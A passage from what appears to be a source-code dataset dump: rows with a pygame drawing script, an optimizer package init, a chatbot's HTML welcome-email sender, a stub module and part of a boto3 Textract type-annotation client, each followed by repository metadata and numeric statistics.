np.array([world_size[0]/2.0, world_size[1]/2.0]))
# convert to display coordinates
poses_temp[:,0] = poses_temp[:,0] / world_size[0]
poses_temp[:,0] = poses_temp[:,0] * screen_size[0]
poses_temp[:,1] = poses_temp[:,1] / world_size[1]
poses_temp[:,1] = 1.0 - poses_temp[:,1]
poses_temp[:,1] = poses_temp[:,1] * screen_size[1]
return poses_temp.astype(int)
disp_poses = cal_disp_poses()
# draw the loop shape on pygame window
color_white = (255,255,255)
color_black = (0,0,0)
screen = pygame.display.set_mode(screen_size)
screen.fill(color_white)
for i in range(swarm_size):
pygame.draw.circle(screen, color_black, disp_poses[i], 5, 0)
for i in range(swarm_size-1):
pygame.draw.line(screen, color_black, disp_poses[i], disp_poses[i+1], 2)
pygame.draw.line(screen, color_black, disp_poses[0], disp_poses[swarm_size-1], 2)
pygame.display.update()
# # save the screen as image
# filepath = os.path.join('images',filename+'.png')
# pygame.image.save(screen, filepath)
raw_input("<Press ENTER to exit>")
| 42.667901 | 88 | 0.716241 | 5,844 | 34,561 | 3.934292 | 0.037988 | 0.219729 | 0.095555 | 0.132307 | 0.915057 | 0.912622 | 0.906272 | 0.900444 | 0.893746 | 0.890614 | 0 | 0.048024 | 0.139637 | 34,561 | 809 | 89 | 42.720643 | 0.725206 | 0.893464 | 0 | 0.040816 | 1 | 0 | 0.007755 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061224 | false | 0 | 0.102041 | 0 | 0.22449 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
799300c81d72c26073882da9add41c4a72c74076 | 159 | py | Python | machina/optims/__init__.py | AswinRetnakumar/Machina | 6519935ca4553192ac99fc1c7c1e7cab9dd72693 | [
"MIT"
] | 302 | 2019-03-13T10:21:29.000Z | 2022-03-25T10:01:46.000Z | machina/optims/__init__.py | AswinRetnakumar/Machina | 6519935ca4553192ac99fc1c7c1e7cab9dd72693 | [
"MIT"
] | 50 | 2019-03-13T09:45:00.000Z | 2021-12-23T18:32:00.000Z | machina/optims/__init__.py | AswinRetnakumar/Machina | 6519935ca4553192ac99fc1c7c1e7cab9dd72693 | [
"MIT"
] | 55 | 2019-03-17T01:59:57.000Z | 2022-03-28T01:13:40.000Z | from machina.optims.adamw import AdamW
from machina.optims.distributed_adamw import DistributedAdamW
from machina.optims.distributed_sgd import DistributedSGD
| 39.75 | 61 | 0.886792 | 20 | 159 | 6.95 | 0.45 | 0.23741 | 0.366906 | 0.402878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075472 | 159 | 3 | 62 | 53 | 0.945578 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
79aa4facd3dffd634c91db6c97f064dee9340a45 | 20,611 | py | Python | model/sendemail.py | IlhamriSKY/vanika-chatbot-line | c2060262053ac8c4ea850337baad52e883a0838a | [
"Apache-2.0"
] | 2 | 2019-10-31T21:20:19.000Z | 2019-11-12T19:48:57.000Z | model/sendemail.py | IlhamriSKY/vanika-chatbot-line | c2060262053ac8c4ea850337baad52e883a0838a | [
"Apache-2.0"
] | null | null | null | model/sendemail.py | IlhamriSKY/vanika-chatbot-line | c2060262053ac8c4ea850337baad52e883a0838a | [
"Apache-2.0"
] | 1 | 2021-02-04T08:07:42.000Z | 2021-02-04T08:07:42.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
""" Database """
from controler.config import Config
class Email(object):
def kirimEmail(email, username, userid):
# me == my email address
# you == recipient's email address
me = "vanika@unika.ac.id"
you = email
header = "Selamat datang di VANIKA"
nickname = username
user_id = userid
img = "https://vanika.tru.io/vanikabot/welcomeemail.jpg"
# Create message container - the correct MIME type is multipart/alternative.
msg = MIMEMultipart('alternative')
msg['Subject'] = "Vanika Say Thanks"
msg['From'] = me
msg['To'] = you
# Create the body of the message (a plain-text and an HTML version).
text = "Vanika Say Thanks"
html = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<!--[if gte mso 9]><xml><o:OfficeDocumentSettings><o:AllowPNG/><o:PixelsPerInch>96</o:PixelsPerInch></o:OfficeDocumentSettings></xml><![endif]-->
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<meta content="width=device-width" name="viewport"/>
<!--[if !mso]><!-->
<meta content="IE=edge" http-equiv="X-UA-Compatible"/>
<!--<![endif]-->
<title></title>
<!--[if !mso]><!-->
<!--<![endif]-->
<style type="text/css">
body {
margin: 0;
padding: 0;
}
table,
td,
tr {
vertical-align: top;
border-collapse: collapse;
}
* {
line-height: inherit;
}
a[x-apple-data-detectors=true] {
color: inherit !important;
text-decoration: none !important;
}
</style>
<style id="media-query" type="text/css">
@media (max-width: 520px) {
.block-grid,
.col {
min-width: 320px !important;
max-width: 100% !important;
display: block !important;
}
.block-grid {
width: 100% !important;
}
.col {
width: 100% !important;
}
.col>div {
margin: 0 auto;
}
img.fullwidth,
img.fullwidthOnMobile {
max-width: 100% !important;
}
.no-stack .col {
min-width: 0 !important;
display: table-cell !important;
}
.no-stack.two-up .col {
width: 50% !important;
}
.no-stack .col.num4 {
width: 33% !important;
}
.no-stack .col.num8 {
width: 66% !important;
}
.no-stack .col.num4 {
width: 33% !important;
}
.no-stack .col.num3 {
width: 25% !important;
}
.no-stack .col.num6 {
width: 50% !important;
}
.no-stack .col.num9 {
width: 75% !important;
}
.video-block {
max-width: none !important;
}
.mobile_hide {
min-height: 0px;
max-height: 0px;
max-width: 0px;
display: none;
overflow: hidden;
font-size: 0px;
}
.desktop_hide {
display: block !important;
max-height: none !important;
}
}
</style>
</head>
<body class="clean-body" style="margin: 0; padding: 0; -webkit-text-size-adjust: 100%; background-color: #FFFFFF;">
<!--[if IE]><div class="ie-browser"><![endif]-->
<table bgcolor="#FFFFFF" cellpadding="0" cellspacing="0" class="nl-container" role="presentation" style="table-layout: fixed; vertical-align: top; min-width: 320px; Margin: 0 auto; border-spacing: 0; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt; background-color: #FFFFFF; width: 100%;" valign="top" width="100%">
<tbody>
<tr style="vertical-align: top;" valign="top">
<td style="word-break: break-word; vertical-align: top;" valign="top">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td align="center" style="background-color:#FFFFFF"><![endif]-->
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:transparent"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:transparent;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px; font-family: Arial, sans-serif"><![endif]-->
<div style="color:#555555;font-family:Arial, 'Helvetica Neue', Helvetica, sans-serif;line-height:1.2;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px;">
<div style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 1.2; color: #555555; mso-line-height-alt: 14px;">
<p style="font-size: 22px; line-height: 1.2; text-align: center; mso-line-height-alt: 26px; margin: 0;"><span style="font-size: 22px; color: #ffffff;"><strong>VANIKA</strong></span></p>
</div>
</div>
<!--[if mso]></td></tr></table><![endif]-->
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:transparent"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:transparent;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<div align="center" class="img-container center autowidth" style="padding-right: 0px;padding-left: 0px;">
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr style="line-height:0px"><td style="padding-right: 0px;padding-left: 0px;" align="center"><![endif]--><img align="center" alt="Image" border="0" class="center autowidth" src="""+img+""" style="text-decoration: none; -ms-interpolation-mode: bicubic; border: 0; height: auto; width: 100%; max-width: 227px; display: block;" title="Image" width="227"/>
<!--[if mso]></td></tr></table><![endif]-->
</div>
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: #FFFFFF;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:#FFFFFF;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:#FFFFFF"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:#FFFFFF;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px; font-family: Arial, sans-serif"><![endif]-->
<div style="color:#555555;font-family:Arial, 'Helvetica Neue', Helvetica, sans-serif;line-height:1.2;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px;">
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Hi """+nickname+""",</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Selamat datang di Vanika, Terimakasih sudah melakukan registrasi menggunakan alamat email ini.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Team Vanika mengembangkan Vanika untuk mempermudah mahasiswa mengakses Nilai berbentuk IPK, IPS dan transkrip serta Tagihan pembayaran melalui media Chatbot pada aplikasi LINE MESSENGER.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Kami berharap mahasiswa dapat menggunakan Vanika dengan mudah, Vanika sendiri akan selalu dikembangkan dengan fitur-fitur lainnya.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Silahkan menggunakan fitur mahasiswa dan mengobrol dengan Vanika.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Have FUN.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
</div>
<!--[if mso]></td></tr></table><![endif]-->
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:transparent"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:transparent;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px; font-family: Arial, sans-serif"><![endif]-->
<div style="color:#555555;font-family:Arial, 'Helvetica Neue', Helvetica, sans-serif;line-height:1.2;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px;">
<div style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 1.2; color: #555555; mso-line-height-alt: 14px;">
<p style="font-size: 14px; line-height: 1.2; text-align: center; mso-line-height-alt: 17px; margin: 0;"><span style="color: #ffffff; font-size: 14px;">Email ini adalah pesan automatis yang dikirim setelah melakukan registrasi di Vanika, Jika kamu tidak merasa melakukan registrasi mohon abaikan email ini.<br/></span></p>
</div>
</div>
<!--[if mso]></td></tr></table><![endif]-->
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:transparent"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:transparent;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px; font-family: Arial, sans-serif"><![endif]-->
<div style="color:#555555;font-family:Arial, 'Helvetica Neue', Helvetica, sans-serif;line-height:1.2;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px;">
<div style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 1.2; color: #555555; mso-line-height-alt: 14px;">
<p style="font-size: 14px; line-height: 1.2; text-align: center; mso-line-height-alt: 17px; margin: 0;"><span style="color: #ffffff; font-size: 14px;">Made with ❤️ by Vanika Teams<br/></span></p>
<p style="font-size: 14px; line-height: 1.2; text-align: center; mso-line-height-alt: 17px; margin: 0;"><span style="color: #ffffff; font-size: 14px;">©Vanika 2019<br/></span></p>
<p style="font-size: 14px; line-height: 1.2; text-align: center; mso-line-height-alt: 17px; margin: 0;"><span style="color: #a0a0a0; font-size: 14px;">"""+user_id+"""<br/></span></p>
</div>
</div>
<!--[if mso]></td></tr></table><![endif]-->
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
</td>
</tr>
</tbody>
</table>
<!--[if (IE)]></div><![endif]-->
</body>
</html>
"""
# Record the MIME types of both parts - text/plain and text/html.
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')
# Attach parts into message container.
# According to RFC 2046, the last part of a multipart message, in this case
# the HTML message, is best and preferred.
msg.attach(part1)
msg.attach(part2)
# Send the message via local SMTP server.
#s = smtplib.SMTP('smtp.gmail.com.')
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo
smtpserver.login(Config.email, Config.password)
# sendmail function takes 3 arguments: sender's address, recipient's address
# and message to send - here it is sent as one string.
smtpserver.sendmail(me, you, msg.as_string()) | 62.838415 | 481 | 0.677599 | 2,940 | 20,611 | 4.747959 | 0.118707 | 0.034386 | 0.054445 | 0.053729 | 0.740168 | 0.728132 | 0.724407 | 0.721971 | 0.719393 | 0.717888 | 0 | 0.047815 | 0.104022 | 20,611 | 328 | 482 | 62.838415 | 0.707911 | 0.030954 | 0 | 0.521127 | 0 | 0.264085 | 0.955676 | 0.223676 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003521 | false | 0.003521 | 0.105634 | 0 | 0.112676 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
79af5a881d7643b0f8b359b6aaed2ad302e78d07 | 47 | py | Python | src/utils/api_loader.py | amasiukevich/ALHE | 6864c37487b5f653924c0f7793ac8decf174b352 | [
"MIT"
] | null | null | null | src/utils/api_loader.py | amasiukevich/ALHE | 6864c37487b5f653924c0f7793ac8decf174b352 | [
"MIT"
] | null | null | null | src/utils/api_loader.py | amasiukevich/ALHE | 6864c37487b5f653924c0f7793ac8decf174b352 | [
"MIT"
] | null | null | null | import requests
def load_from_api():
pass | 9.4 | 20 | 0.723404 | 7 | 47 | 4.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212766 | 47 | 5 | 21 | 9.4 | 0.864865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
79e0405053d35d7ee192a6a4c94cd809633927db | 70,955 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/textract/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/textract/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/textract/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def analyze_document(self, Document: Dict, FeatureTypes: List) -> Dict:
"""
Analyzes an input document for relationships between detected items.
The types of information returned are as follows:
* Words and lines that are related to nearby lines and words. The related information is returned in two Block objects each of type ``KEY_VALUE_SET`` : a KEY Block object and a VALUE Block object. For example, *Name: Ana Silva Carolina* contains a key and value. *Name:* is the key. *Ana Silva Carolina* is the value.
* Table and table cell data. A TABLE Block object contains information about a detected table. A CELL Block object is returned for each cell in a table.
* Selectable elements such as checkboxes and radio buttons. A SELECTION_ELEMENT Block object contains information about a selectable element.
* Lines and words of text. A LINE Block object contains one or more WORD Block objects.
You can choose which type of analysis to perform by specifying the ``FeatureTypes`` list.
The output is returned in a list of ``BLOCK`` objects.
``AnalyzeDocument`` is a synchronous operation. To analyze documents asynchronously, use StartDocumentAnalysis .
For more information, see `Document Text Analysis <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-analyzing.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/AnalyzeDocument>`_
**Request Syntax**
::
response = client.analyze_document(
Document={
'Bytes': b'bytes',
'S3Object': {
'Bucket': 'string',
'Name': 'string',
'Version': 'string'
}
},
FeatureTypes=[
'TABLES'|'FORMS',
]
)
**Response Syntax**
::
{
'DocumentMetadata': {
'Pages': 123
},
'Blocks': [
{
'BlockType': 'KEY_VALUE_SET'|'PAGE'|'LINE'|'WORD'|'TABLE'|'CELL'|'SELECTION_ELEMENT',
'Confidence': ...,
'Text': 'string',
'RowIndex': 123,
'ColumnIndex': 123,
'RowSpan': 123,
'ColumnSpan': 123,
'Geometry': {
'BoundingBox': {
'Width': ...,
'Height': ...,
'Left': ...,
'Top': ...
},
'Polygon': [
{
'X': ...,
'Y': ...
},
]
},
'Id': 'string',
'Relationships': [
{
'Type': 'VALUE'|'CHILD',
'Ids': [
'string',
]
},
],
'EntityTypes': [
'KEY'|'VALUE',
],
'SelectionStatus': 'SELECTED'|'NOT_SELECTED',
'Page': 123
},
]
}
**Response Structure**
- *(dict) --*
- **DocumentMetadata** *(dict) --*
Metadata about the analyzed document. An example is the number of pages.
- **Pages** *(integer) --*
The number of pages detected in the document.
- **Blocks** *(list) --*
The text that's detected and analyzed by ``AnalyzeDocument`` .
- *(dict) --*
A ``Block`` represents items that are recognized in a document within a group of pixels close to each other. The information returned in a ``Block`` depends on the type of operation. In document-text detection (for example DetectDocumentText ), you get information about the detected words and lines of text. In text analysis (for example AnalyzeDocument ), you can also get information about the fields, tables and selection elements that are detected in the document.
An array of ``Block`` objects is returned by both synchronous and asynchronous operations. In synchronous operations, such as DetectDocumentText , the array of ``Block`` objects is the entire set of results. In asynchronous operations, such as GetDocumentAnalysis , the array is returned over one or more responses.
For more information, see `How Amazon Textract Works <https://docs.aws.amazon.com/textract/latest/dg/how-it-works.html>`__ .
- **BlockType** *(string) --*
The type of text that's recognized in a block. In text-detection operations, the following types are returned:
* *PAGE* - Contains a list of the LINE Block objects that are detected on a document page.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
In text analysis operations, the following types are returned:
* *PAGE* - Contains a list of child Block objects that are detected on a document page.
* *KEY_VALUE_SET* - Stores the KEY and VALUE Block objects for a field that's detected on a document page. Use the ``EntityType`` field to determine if a KEY_VALUE_SET object is a KEY Block object or a VALUE Block object.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces that's detected on a document page.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
* *TABLE* - A table that's detected on a document page. A table is any grid-based information with 2 or more rows or columns with a cell span of 1 row and 1 column each.
* *CELL* - A cell within a detected table. The cell is the parent of the block that contains the text in the cell.
* *SELECTION_ELEMENT* - A selectable element such as a radio button or checkbox that's detected on a document page. Use the value of ``SelectionStatus`` to determine the status of the selection element.
- **Confidence** *(float) --*
The confidence that Amazon Textract has in the accuracy of the recognized text and the accuracy of the geometry points around the recognized text.
- **Text** *(string) --*
The word or line of text that's recognized by Amazon Textract.
- **RowIndex** *(integer) --*
The row in which a table cell is located. The first row position is 1. ``RowIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnIndex** *(integer) --*
